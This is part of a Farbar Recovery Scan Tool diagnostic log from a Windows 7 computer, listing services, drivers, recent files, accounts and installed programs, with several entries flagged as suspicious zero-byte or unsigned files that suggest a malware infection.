S3 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [54024 2018-02-21] (ProtonVPN AG -> )
R2 Realtek11nCU; C:\Program Files (x86)\ASUS\USB-N10 WLAN Card Utilities\RtlService.exe [36864 2012-05-10] (Realtek Semiconductor Corp.) [File not signed]
R2 RemediationService; C:\Program Files (x86)\CheckPoint\Endpoint Security\Remediation\RemediationService.exe [18168 2019-11-04] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
R2 TESvc; C:\Program Files (x86)\CheckPoint\Endpoint Security\Threat Emulation\TESvc.exe [301304 2019-11-04] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
S2 vsmon; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [4528344 2020-01-21] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [28760 2019-11-29] (LAVASOFT SOFTWARE CANADA INC -> )
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-04-19] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R2 ZA NET ICM Service; C:\Program Files (x86)\CheckPoint\ICM\ICM-Service-NET.exe [40304 2019-02-07] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
S3 ZAARUpdateService; C:\Program Files (x86)\CheckPoint\Endpoint Security\TPCommon\Cipolla\ZAARUpdateService.exe [51936 2019-11-27] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
S3 ZAPrivacyService; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe [114936 2020-01-21] (Check Point Software Technologies Ltd. -> Check Point Software Technologies, Ltd.)
S4 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59648 2013-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)
R2 AODDriver4.3.0; C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [60104 2015-02-19] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)
R3 AscFileFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [27528 2019-07-15] (IObit CO., LTD -> IObit)
R3 AscRegistryFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [28064 2019-07-15] (IObit CO., LTD -> IObit)
R1 AsrAppCharger; C:\Windows\System32\DRIVERS\AsrAppCharger.sys [17192 2011-11-07] (ASROCK Incorporation -> Windows (R) Win 7 DDK provider)
R3 AsrDrv101; C:\Windows\SysWOW64\Drivers\AsrDrv101.sys [22280 2018-02-07] (ASROCK Incorporation -> ASRock Incorporation)
R0 AsrRamDisk; C:\Windows\System32\DRIVERS\AsrRamDisk.sys [40200 2013-08-02] (ASROCK Incorporation -> ASRock Inc.)
R1 cFosSpeed; C:\Windows\System32\DRIVERS\cfosspeed6.sys [1814880 2013-05-31] (cFos Software GmbH -> cFos Software GmbH)
R2 cpbak; C:\Windows\System32\DRIVERS\cpbak.sys [66848 2019-11-05] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)
R1 CPEPMon; C:\Windows\System32\DRIVERS\CPEPMon.sys [110880 2019-11-05] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)
S3 cpuz145; C:\Windows\temp\cpuz145\cpuz145_x64.sys [49968 2020-04-09] (CPUID -> CPUID)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [42256 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [59360 2020-01-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R1 epnetflt; C:\Windows\system32\drivers\epnetflt.sys [130336 2019-10-06] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)
R1 epregflt; C:\Windows\system32\drivers\epregflt.sys [132176 2019-05-01] (Check Point Software Technologies Ltd. -> Check Point Software Technologies)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2019-03-16] (Martin Malik - REALiX -> REALiX™)
S3 iobit_monitor_server; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [14680 2018-07-04] (IObit Information Technology -> IObit)
R2 ISWKL; C:\Program Files (x86)\CheckPoint\Endpoint Security\Endpoint Common\bin\ISWKL.sys [65264 2019-08-12] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
R3 IUFileFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUFileFilter.sys [27224 2020-07-08] (IObit CO., LTD -> IObit)
R3 IUProcessFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUProcessFilter.sys [19280 2020-07-08] (IObit CO., LTD -> IObit)
R3 IURegistryFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IURegistryFilter.sys [32856 2020-07-08] (IObit CO., LTD -> IObit)
S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [3591384 2014-10-13] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11973 2020-01-06] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2018-08-29] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [36792 2017-08-24] (ProtonVPN AG -> The OpenVPN Project)
R1 Vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [461240 2017-12-28] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-09-05] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
U3 iswSvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-01 01:24 - 2020-10-01 01:26 - 000032327 _____ C:\Users\Ohm\Desktop\FRST.txt
2020-10-01 01:23 - 2020-08-03 20:13 - 000001132 _____ C:\Users\Ohm\Desktop\AH3LMSSS - Shortcut.lnk
2020-10-01 01:22 - 2020-08-07 13:39 - 000000985 _____ C:\Users\Ohm\Desktop\Dead or Alive 5 - Last Round.lnk
2020-10-01 01:21 - 2020-10-01 01:25 - 000000000 ____D C:\FRST
2020-10-01 01:20 - 2020-10-01 01:20 - 002299392 _____ (Farbar) C:\Users\Ohm\Desktop\FRST64.exe
2020-09-28 21:36 - 2020-09-28 21:36 - 000000800 _____ C:\Users\Ohm\Desktop\Fightcade2.lnk
2020-09-28 21:36 - 2020-09-28 21:36 - 000000800 _____ C:\Users\Ohm\Desktop\Fightcade1.lnk
2020-09-23 15:55 - 2020-09-24 03:29 - 000007600 _____ C:\Users\Ohm\AppData\Local\Resmon.ResmonCfg
2020-09-20 18:38 - 2020-09-20 18:38 - 000001191 _____ C:\Users\Ohm\Desktop\Gemcraft!! - Shortcut.lnk
2020-09-20 17:59 - 2020-09-22 19:50 - 000000064 _____ C:\Users\Ohm\Desktop\dsfa.txt
2020-09-20 00:33 - 2020-09-20 00:33 - 000001131 _____ C:\Users\Ohm\Desktop\TOTAL WAR! - Shortcut.lnk
2020-09-19 22:58 - 2020-09-19 22:58 - 000000986 _____ C:\Users\Ohm\Desktop\TOWER! - Shortcut.lnk
2020-09-19 22:58 - 2020-09-19 22:58 - 000000966 _____ C:\Users\Ohm\Desktop\RPG! - Shortcut.lnk
2020-09-19 22:58 - 2020-08-05 13:25 - 000001007 _____ C:\Users\Ohm\Desktop\UNDER NIGHT IN BIRTH ExeLate clr.lnk
2020-09-19 22:57 - 2020-09-19 22:57 - 000000991 _____ C:\Users\Ohm\Desktop\GAMES!! - Shortcut.lnk
2020-09-19 22:57 - 2020-09-19 22:57 - 000000986 _____ C:\Users\Ohm\Desktop\BRAWL! - Shortcut.lnk
2020-09-19 22:56 - 2020-09-19 22:56 - 000000986 _____ C:\Users\Ohm\Desktop\CARDS!.lnk
2020-09-19 22:56 - 2020-09-19 22:56 - 000000853 _____ C:\Users\Ohm\Desktop\ALL GG!.lnk
2020-09-19 22:55 - 2020-01-23 22:04 - 000001637 _____ C:\Users\Ohm\Desktop\Legends of Runeterra.lnk
2020-09-19 22:52 - 2020-09-19 22:54 - 000000000 ____D C:\Users\Ohm\Desktop\RST!
2020-09-18 20:22 - 2020-09-18 20:22 - 000000000 ____D C:\Users\Ohm\Downloads\TORR2!&MOAR;!
2020-09-18 20:22 - 2020-09-18 20:22 - 000000000 ____D C:\Users\Ohm\Downloads\0
2020-09-11 01:47 - 2020-07-23 11:59 - 000001023 _____ C:\Users\Ohm\Desktop\Resonance of Fate! HD Edition.lnk
2020-09-11 00:51 - 2020-09-11 00:51 - 000000036 _____ C:\Users\Ohm\.fcuid
2020-09-11 00:50 - 2020-09-28 21:40 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\fightcade-nativefier-b096d2
2020-09-09 07:47 - 2020-10-01 01:18 - 000003128 _____ C:\Windows\system32\Tasks\FRAPS
2020-09-06 16:23 - 2020-09-06 16:23 - 000000000 ____D C:\Users\Ohm\AppData\Local\BANDAI NAMCO Games
2020-09-06 16:19 - 2020-09-06 16:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragonball Xenoverse Bundle Edition
2020-09-06 10:20 - 2020-09-06 10:21 - 000000000 ____D C:\Users\Ohm\Documents\NFS Undercover
2020-09-06 10:20 - 2020-09-06 10:20 - 000183112 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2020-09-06 10:20 - 2020-09-06 10:20 - 000066872 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2020-09-06 10:20 - 2020-09-06 10:20 - 000000000 ____D C:\Users\Ohm\AppData\Local\PunkBuster
2020-09-05 19:51 - 2020-09-05 19:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Need for Speed World - Offline
2020-09-05 19:35 - 2020-09-05 19:35 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NFS Most Wanted
2020-09-05 19:35 - 2020-09-05 19:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NFS Most Wanted
2020-09-05 19:34 - 2020-09-05 19:34 - 000000000 ____D C:\Users\Ohm\Documents\NFS Most Wanted
2020-09-05 18:54 - 2020-09-05 18:54 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\Leadertech
2020-09-05 18:26 - 2020-09-05 18:26 - 000003022 _____ C:\Windows\system32\Tasks\{1918CEA6-941B-49B5-B05C-B242183C1EBD}
2020-09-05 17:41 - 2020-09-05 17:41 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\3d03298b616c
2020-09-05 17:04 - 2020-10-01 01:16 - 000003476 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-09-05 17:04 - 2020-10-01 01:16 - 000003164 _____ C:\Windows\system32\Tasks\csrss
2020-09-05 17:04 - 2020-09-05 17:04 - 005551336 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-09-05 17:04 - 2020-09-05 17:04 - 000634432 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-09-05 17:04 - 2020-09-05 17:04 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-09-05 17:04 - 2020-09-05 17:04 - 000000000 ____D C:\Program Files (x86)\wcze
2020-09-05 16:12 - 2020-09-05 16:13 - 000000000 ____D C:\Users\Ohm\Documents\NFSTR
2020-09-05 14:54 - 2020-09-05 14:54 - 000000929 _____ C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Need for Speed Underground 2.lnk
2020-09-05 08:20 - 2020-10-01 01:16 - 000003092 _____ C:\Windows\system32\Tasks\AMDLinkUpdate

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-01 01:24 - 2018-02-08 15:46 - 000000000 ____D C:\Users\Ohm\AppData\LocalLow\Mozilla
2020-10-01 01:21 - 2019-03-16 17:23 - 000002824 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Ohm)
2020-10-01 01:20 - 2009-07-14 07:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-10-01 01:20 - 2009-07-14 07:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-10-01 01:18 - 2018-02-09 00:05 - 000000000 ____D C:\Fraps
2020-10-01 01:16 - 2020-05-14 10:20 - 000002956 _____ C:\Windows\system32\Tasks\AsrSP.exe
2020-10-01 01:13 - 2009-07-14 08:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-01 01:07 - 2018-02-07 14:11 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2020-10-01 00:49 - 2018-02-08 12:14 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\vlc
2020-09-30 23:16 - 2018-09-18 22:02 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\tixati
2020-09-30 22:48 - 2018-02-09 00:00 - 000000000 ____D C:\Program Files (x86)\Steam
2020-09-28 21:36 - 2020-07-31 11:47 - 000000800 _____ C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Fightcade2.lnk
2020-09-28 21:36 - 2020-07-31 11:47 - 000000800 _____ C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Fightcade1.lnk
2020-09-28 21:34 - 2020-07-31 11:50 - 000000034 _____ C:\Users\Ohm\ggpo-ng.ini
2020-09-28 21:24 - 2019-08-07 15:05 - 000000000 ____D C:\Users\Ohm\Desktop\ALL!
2020-09-28 08:01 - 2020-03-28 13:10 - 000004608 _____ C:\Users\Ohm\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-09-27 08:00 - 2019-03-16 17:23 - 000000000 ____D C:\ProgramData\ProductData
2020-09-27 07:53 - 2009-07-14 08:08 - 000032596 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-09-26 23:11 - 2020-01-03 16:03 - 000000374 _____ C:\Users\Ohm\.vivaldi_reporting_data
2020-09-23 21:58 - 2019-03-05 00:50 - 000002341 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2020-09-22 17:48 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\system32\NDF
2020-09-22 13:21 - 2018-12-20 11:18 - 000000000 ___RD C:\Users\Ohm\Documents\Scanned Documents
2020-09-20 19:07 - 2018-11-11 19:55 - 000000000 ____D C:\Program Files\Waterfox
2020-09-20 17:03 - 2019-03-05 00:45 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\Yandex
2020-09-20 17:03 - 2019-03-05 00:45 - 000000000 ____D C:\Users\Ohm\AppData\Local\Yandex
2020-09-20 17:00 - 2018-02-07 14:14 - 000000000 ____D C:\Program Files (x86)\Google
2020-09-13 13:58 - 2019-09-11 00:25 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\WeMod
2020-09-13 13:57 - 2020-03-02 20:11 - 000000000 ____D C:\Users\Ohm\Documents\FLiNGTrainer
2020-09-13 13:35 - 2018-12-16 00:36 - 000000000 ____D C:\Users\Ohm\AppData\Local\CrashDumps
2020-09-11 00:51 - 2018-02-07 13:40 - 000000000 ____D C:\Users\Ohm
2020-09-11 00:47 - 2018-10-13 22:18 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\SlimBrowser
2020-09-09 11:20 - 2019-03-05 00:47 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-09-09 11:20 - 2019-03-05 00:47 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-09 11:20 - 2019-03-05 00:47 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2020-09-09 11:20 - 2019-03-05 00:47 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-09-09 11:20 - 2019-03-05 00:46 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-09-09 11:20 - 2019-03-05 00:46 - 000000000 ____D C:\Windows\system32\Macromed
2020-09-06 14:59 - 2018-04-01 12:56 - 000000000 ____D C:\Users\Ohm\AppData\Local\ElevatedDiagnostics
2020-09-06 11:59 - 2018-10-18 22:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2020-09-06 08:14 - 2009-07-14 08:13 - 000794710 _____ C:\Windows\system32\PerfStringBackup.INI
2020-09-06 08:14 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\inf
2020-09-05 18:40 - 2009-07-14 08:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-09-05 14:54 - 2019-01-23 00:56 - 000000000 ____D C:\Users\Ohm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games

==================== Files in the root of some directories ========

2019-04-13 13:37 - 2019-04-13 13:37 - 000000000 _____ () C:\Users\Ohm\AppData\Roaming\FC29FA0894FE.ini
2019-08-19 00:36 - 2019-08-19 00:36 - 000001861 _____ () C:\Users\Ohm\AppData\Roaming\GCCS.rar
2020-03-28 13:10 - 2020-09-28 08:01 - 000004608 _____ () C:\Users\Ohm\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-09-23 15:55 - 2020-09-24 03:29 - 000007600 _____ () C:\Users\Ohm\AppData\Local\Resmon.ResmonCfg
2018-10-22 13:05 - 2018-10-22 12:45 - 000112198 _____ () C:\Users\Ohm\AppData\Local\SSDD.rar
2018-03-28 13:22 - 2018-03-28 13:22 - 000000000 _____ () C:\Users\Ohm\AppData\Local\{C78D79C7-23EC-4BCF-8B03-1F5D875853EB}

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully

LastRegBack: 2020-09-24 21:23
==================== End of FRST.txt ========================

 

 

—————————————————————————————————————————

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-09-2020
Ran by [removed] (01-10-2020 01:26:41)
Running from C:\Users\[removed]\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2018-02-07 10:40:45)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-546064741-869659242-2245885051-500 - Administrator - Disabled)
ASPNET (S-1-5-21-546064741-869659242-2245885051-1005 - Limited - Enabled)
Guest (S-1-5-21-546064741-869659242-2245885051-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-546064741-869659242-2245885051-1003 - Limited - Enabled)
Ohm (S-1-5-21-546064741-869659242-2245885051-1000 - Administrator - Enabled) => C:\Users\Ohm

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ZoneAlarm Free Firewall Firewall (Disabled) {217C3BCF-3FBD-7C30-A427-2D11E16F3BEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

"FIFA 14" (HKLM-x32\…\{6049054B-DB11-48E1-A583-9A565D5C8856}_is1) (Version: 1.4.0.0 - )
7-Zip 18.05 (x64) (HKLM\…\7-Zip) (Version: 18.05 - Igor Pavlov)
Absolute Uninstaller 5.3.1.23 (HKLM-x32\…\Absolute Uninstaller) (Version: 5.3.1.23 - Glarysoft Ltd)
ACP Application (HKLM\…\{B5883E1B-83F0-2B44-46E3-E1F2C708C4A0}) (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe Flash Player 32 PPAPI (HKLM-x32\…\Adobe Flash Player PPAPI) (Version: 32.0.0.433 - Adobe)
Adobe Reader 9 (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-A90000000001}) (Version: 9.0.0 - Adobe Systems Incorporated)
Advanced SystemCare (HKLM-x32\…\Advanced SystemCare_is1) (Version: 13.4.0 - IObit)
Aeronautica Imperialis (HKLM-x32\…\Aeronautica Imperialis_is1) (Version:  - )
Age.of.Empires.II.HD.The.Rise.of.the.Rajas.DLC-ALI213 version 1.0 (HKLM-x32\…\{7FBE1E6A-6F95-4A66-B3A3-0CB216A99247}}_is1) (Version: 1.0 - Ali213.net)
AMD Software (HKLM\…\AMD Catalyst Install Manager) (Version: 19.3.2 - Advanced Micro Devices, Inc.)
Apowersoft Screen Recorder Pro V2.1.9 (HKLM-x32\…\{dc9006db-6b05-4f0f-833b-79ef3f284c24}_is1) (Version: 2.1.9 - APOWERSOFT LIMITED)
APP Shop v1.0.12 (HKLM-x32\…\{90242E9B-BC60-46E3-8EE7-8E953F702280}_is1) (Version: 1.0.12 - ASRock Inc.)
AppKiwi - Download & Play Apps version 1.4.3 (HKLM-x32\…\{6B113F5B-8DFB-4918-8B62-FAB714EEC351}_is1) (Version: 1.4.3 - Strategic Media Enterprises, LLC)
ASRock App Charger v1.0.6 (HKLM\…\ASRock App Charger_is1) (Version: 1.0.6 - ASRock Inc.)
ASRock XFast RAM v3.0.3 (HKLM\…\ASRock XFast RAM_is1) (Version:  - ASRock Inc.)
ASUS USB-N10 WLAN Card Utilities & Driver (HKLM-x32\…\{9C049499-055C-4a0c-A916-1D12314F45EB}) (Version: 1.0.0.5 - ASUS)
A-Tuning v2.0.158 (HKLM-x32\…\A-Tuning_is1) (Version: 2.0.158 - )
AutoHotkey 1.1.33.02 (HKLM\…\AutoHotkey) (Version: 1.1.33.02 - Lexikos)
Avant Browser (remove only) (HKLM-x32\…\AvantBrowser) (Version: 12.5.0.0 - Avant Force)
Barbarian Invasion (HKLM-x32\…\{FD69C8CB-6964-432C-98AB-A5A09ED50EEA}) (Version: 1.4 - )
Battle Realms Complete (HKLM-x32\…\Battle Realms Complete_is1) (Version:  - GOG.com)
Battlefleet.Gothic.Armada.v1.8.10317+3DLC version 1.8 (HKLM-x32\…\{6D12F740-7AF0-4EEA-947A-CFC790A52C3C}}_is1) (Version: 1.8 - Ali213.net)
BlazBlue -  Calamity Trigger (HKLM-x32\…\GOGPACKBLAZBLUECT_is1) (Version: 2.0.0.3 - GOG.com)
BlazBlue Centralfiction (HKLM-x32\…\BlazBlue Centralfiction_is1) (Version:  - )
BlazBlue: Chronophantasma Extend (HKLM\…\YmxhemJsdWVjaHJvbm9waGFudGFzbWFleHRlbmQ_is1) (Version: 1 - )
BlazBlue: Continuum Shift Extend (HKLM-x32\…\BlazBlue: Continuum Shift Extend_is1) (Version:  - H2 Interactive Co., Ltd.)
BlazBlue: Cross Tag Battle (HKLM-x32\…\BlazBlue: Cross Tag Battle_is1) (Version:  - )
Branding64 (HKLM\…\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
Brave (HKLM-x32\…\BraveSoftware Brave-Browser) (Version: 85.1.14.84 - Brave Software Inc)
BYOND (HKLM-x32\…\BYOND) (Version: 512.1485 - BYOND)
calibre 64bit (HKLM\…\{A9CFF5B2-9CF6-4903-ACD1-CE9CFDFD6206}) (Version: 3.34.0 - Kovid Goyal)
CARRION (HKLM-x32\…\CARRION_is1) (Version:  - )
CDisplay 1.8 (HKLM-x32\…\CDisplay_is1) (Version:  - dvd8n)
Check Point SBA (HKLM\…\{C8325D51-E514-475B-AFF2-550C3527E563}) (Version: 86.5.9511 - Check Point Software Technologies Ltd.) Hidden
Cisco EAP-FAST Module (HKLM-x32\…\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\…\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\…\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Command & Conquer™ Red Alert™ 3 Uprising (HKLM-x32\…\{DDE59617-F59A-473B-BC4E-C2B81F6CD38D}) (Version: 1.0.1.0 - Electronic Arts)
Command And Conquer Red Alert 2 Yuri's Revenge 1.001 (HKLM-x32\…\Command_And_Conquer_Yuri's_Revenge_1.001_MPI) (Version:  - )
Comodo Dragon (HKLM-x32\…\Comodo Dragon) (Version: 83.0.4103.116 - Comodo)
ControlMK 0.232 (HKLM-x32\…\ControlMK) (Version: 0.232 - Redcl0ud)
DAEMON Tools Lite (HKLM\…\DAEMON Tools Lite) (Version: 10.12.0.1114 - Disc Soft Ltd)
Dawn of War - Dark Crusade (HKLM-x32\…\{FF39FC01-819B-42E4-AE49-1968AF12DDD4}) (Version: 1.00.0000 - THQ)
Dawn of War - Soulstorm (HKLM-x32\…\{20533183-D42D-4261-A125-956736FBEA8C}) (Version: 1.00.0000 - THQ)
Dawn of War - Soulstorm (HKLM-x32\…\{34B9B494-EF4A-4592-87A8-BE40D0442E86}) (Version: 1.00.0000 - THQ) Hidden
Dawn Of War and Winter Assault (HKLM-x32\…\{362D5167-9716-44BE-89FD-BF9EB6EF814B}) (Version: 1.00.00000 - ) Hidden
Dawn Of War and Winter Assault (HKLM-x32\…\Dawn Of War and Winter Assault_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Dawn of War Dark Crusade (HKLM-x32\…\Dawn of War Dark Crusade_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Galfimbul)
Dead or Alive 5: Last Round (HKLM-x32\…\Dead or Alive 5: Last Round_is1) (Version:  - )
Devil May Cry 3 Special Edition (HKLM-x32\…\{D4A8FCAB-9D30-4509-A3F1-D0B7E1BE9F00}) (Version: 1.00.000 - CAPCOM)
Devil May Cry 4 Special Edition version 1.0.0 (HKLM-x32\…\Devil May Cry 4 Special Edition_is1) (Version: 1.0.0 - Capcom)
DirLister 1.0 (HKLM-x32\…\DirLister) (Version: 1.0 - DukeLupus)
Discord (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Discord) (Version: 0.0.305 - Discord Inc.)
Divinity - Dragon Commander (HKLM-x32\…\1207659263_is1) (Version: 1.0.124 hotfix - GOG.com)
Divinity - Dragon Commander Imperial Edition Upgrade (HKLM-x32\…\1207659246_is1) (Version: 1.0.124 hotfix - GOG.com)
Divinity: Original Sin Enhanced Edition (HKLM-x32\…\1445516929_is1) (Version: 2.0.119.430 KO update - GOG.com)
DmC - Devil May Cry (HKLM-x32\…\DmC - Devil May Cry_is1) (Version:  - )
Domination (HKLM-x32\…\Domination) (Version:  - )
Dragon Age - Origins - Ultimate Edition (HKLM-x32\…\1949616134_is1) (Version: 2.0.0.3 - GOG.com)
Dragonball Xenoverse Bundle Edition (HKLM-x32\…\Dragonball Xenoverse Bundle Edition_is1) (Version:  - )
Driver Booster 6 (HKLM-x32\…\Driver Booster_is1) (Version: 6.3.0 - IObit)
Dungeon Siege 2 (HKLM-x32\…\DungeonSiege2) (Version:  - Microsoft)
Dungeon Siege III Collection (HKLM-x32\…\Dungeon Siege III Collection_is1) (Version:  - )
Dungeons and Dragons - Dragonshard (HKLM-x32\…\GOGPACKDNDDRAGONSHARD_is1) (Version: 2.0.0.10 - GOG.com)
EARTHLOCK - Festival of Magic (HKLM-x32\…\1876172398_is1) (Version: 2.0.0.1 - GOG.com)
Epic Games Launcher (HKLM-x32\…\{5B340CD5-07E3-41AA-9117-0A0EC863E454}) (Version: 1.1.220.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\…\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Privacy Browser (HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Epic) (Version: 62.0.3202.94 - Epic)
Fae Tactics (HKLM-x32\…\Fae Tactics_is1) (Version:  - )
Fallout 3 (HKLM-x32\…\1454315831_is1) (Version: 1.7.0.3 - GOG.com)
Fallout: New Vegas (HKLM-x32\…\1454587428_is1) (Version: 1.4.0.525 - GOG.com)
File & Folder Lister 2.1 (HKLM-x32\…\File & Folder Lister_is1) (Version:  - TriSun Software Limited)
File List Creator (HKLM-x32\…\ST6UNST #1) (Version:  - )
FlashPeak SlimBrowser (HKLM-x32\…\SlimBrowser) (Version: 8.00.005 - FlashPeak Inc.)
Fraps (remove only) (HKLM-x32\…\Fraps) (Version:  - )
